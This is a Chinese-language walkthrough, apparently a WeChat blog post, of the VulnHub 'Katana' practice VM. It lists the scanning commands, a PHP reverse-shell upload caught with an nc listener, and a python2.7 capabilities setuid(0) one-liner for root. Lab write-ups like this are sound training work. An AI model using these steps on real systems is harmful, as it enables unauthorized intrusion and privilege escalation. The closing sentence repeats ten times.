今天实践的是vulnhub的katana镜像,
下载地址,https://download.vulnhub.com/katana/katana.zip,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.177.0/24,
获取到靶机地址192.168.177.148,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.148,
8088端口有web服务,做html路径扫描,
dirb http://192.168.177.148:8088/ -X .html,
获取到http://192.168.177.148:8088/upload.html,浏览器访问,
在kali攻击机上准备php-reverse-shell.php文件,上传,
kali攻击机上准备好反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.177.148:8715/katana_php-reverse-shell.php,获取到了反弹shell,
不是root,需要提权,
搜索设置了capabilities的可执行文件,getcap -r / 2>/dev/null,
用python2.7进行提权,
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")',
id确认是root,
本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之katana的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论